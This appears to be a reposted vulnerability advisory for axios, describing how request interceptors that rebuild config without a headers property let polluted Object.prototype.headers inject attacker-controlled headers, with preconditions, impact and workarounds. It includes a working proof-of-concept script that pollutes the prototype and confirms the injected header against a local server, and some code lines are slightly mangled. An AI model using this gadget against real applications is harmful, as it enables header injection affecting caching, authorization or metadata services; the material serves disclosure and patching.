Listen to this Post
Axios request interceptors may return a replacement config object.
If an interceptor returns a plain object without an own headers property, dispatchRequest() later evaluates config.headers.
That read can resolve an inherited Object.prototype.headers value.
In a process where another vulnerability has polluted Object.prototype.headers, axios can send attacker-controlled headers.
Axios does not create the prototype pollution source.
The interceptor itself is trusted caller code.
The vulnerable behavior is the post-interceptor axios config read.
This reopens a prototype-pollution gadget after earlier null-prototype config hardening.
lib/core/dispatchRequest.js contains:
config.headers = AxiosHeaders.from(config.headers);
The initial merged config is null-prototype.
But an interceptor can replace it with a normal object.
If that object has no own headers, the read can resolve Object.prototype.headers.
Local verification on axios 1.18.1 polluted Object.prototype.headers = { ‘X-Poisoned’: ‘yes’ }.
An interceptor returned { url, method, timeout, proxy: false }.
A request was sent.
The loopback server received X-Poisoned: yes.
Original report validated on axios 1.17.0, commit 4306df2, Node.js v24.15.0.
Preconditions are a separate prototype-pollution primitive that can write an object to Object.prototype.headers.
And a request interceptor that rebuilds config and omits own headers.
Expected safe behavior is that missing headers normalize to an empty header set.
Current affected behavior reads inherited Object.prototype.headers.
Affected functionality includes request interceptor chains where an interceptor returns a new ordinary object.
Replacement config objects that omit an own headers property.
dispatchRequest() header normalization through AxiosHeaders.from(config.headers).
Not affected: requests whose interceptor preserves an own headers property.
Interceptors that mutate and return the existing null-prototype config.
Processes without prototype pollution.
Impact: an attacker with a prior same-process prototype-pollution primitive can inject headers into affected axios requests.
Depending on target service, injected headers can affect cache behavior, conditional requests, metadata services, or authorization and routing logic.
The issue is conditional and should not be described as affecting every interceptor or every request.
Workarounds: interceptors that rebuild config should always set an own headers property.
Preserve config.headers or set headers: {}.
Mutating and returning the existing merged config avoids replacing the null-prototype object.
DailyCVE Form:
Platform: Axios
Version: 1.17.0, 1.18.1
Vulnerability : Prototype Pollution Gadget
Severity: Not specified
date: Not specified
Prediction: v1.20.0 release
(end of form)
What Undercode Say:
Analytics:
npm install [email protected] node poc.js
Object.prototype.headers = { 'X-Poisoned': 'yes' };
const client = axios.create();
client.interceptors.request.use((config) => ({
url: config.url,
method: config.method,
timeout: config.timeout
}));
await client.get(url);
Exploit: (Educational Purposes!)
import axios from './index.js';
import http from 'http';
const start = (handler) => new Promise((resolve) => {
const server = http.createServer(handler);
server.listen(0, '127.0.0.1', () => resolve(server));
});
const stop = (server) => new Promise((resolve) => server.close(resolve));
const hits = [];
const server = await start((req, res) => {
hits.push(req.headers);
res.setHeader('Content-Type', 'application/json');
res.end('{"ok":true}');
});
try {
Object.prototype.headers = {
'X-Poisoned': 'yes',
'If-None-Match': ''
};
const client = axios.create();
client.interceptors.request.use((config) => ({
url: config.url,
method: config.method,
timeout: config.timeout
}));
await client.get(`http://127.0.0.1:${server.address().port}/headers`, {
timeout: 3000
});
console.log(hits[bash]);
} finally {
delete Object.prototype.headers;
await stop(server);
}
Protection: from this CVE
Interceptors that rebuild config should always set an own headers property.
Preserve config.headers or set headers: {}.
Mutating and returning the existing merged config also avoids replacing the null-prototype object.
Ensure no prototype pollution primitive exists in the same process.
Impact:
An attacker with a prior same-process prototype-pollution primitive can inject headers into affected axios requests when the application uses an interceptor that rebuilds config and omits headers.
Depending on the target service, injected headers can affect cache behavior, conditional requests, metadata services, or application-specific authorization and routing logic.
The issue is conditional and should not be described as affecting every interceptor or every request.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

